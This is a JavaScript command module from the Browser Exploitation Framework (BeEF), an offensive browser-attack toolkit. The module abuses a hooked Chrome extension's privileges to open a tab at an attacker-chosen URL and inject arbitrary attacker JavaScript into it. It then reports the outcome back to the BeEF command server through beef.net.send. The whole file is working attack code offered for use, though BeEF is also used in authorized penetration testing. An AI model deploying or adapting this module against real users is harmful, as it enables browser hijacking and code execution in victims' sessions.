// // Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { try{ chrome.tabs.create({url:"<%= @url %>"}, function(tab){ chrome.tabs.executeScript(tab.id,{code:"<%= @theJS %>"}, function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Code executed on tab.id: ' + tab.id); }); }); } catch(error){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Not inside of a Chrome Extension'); } });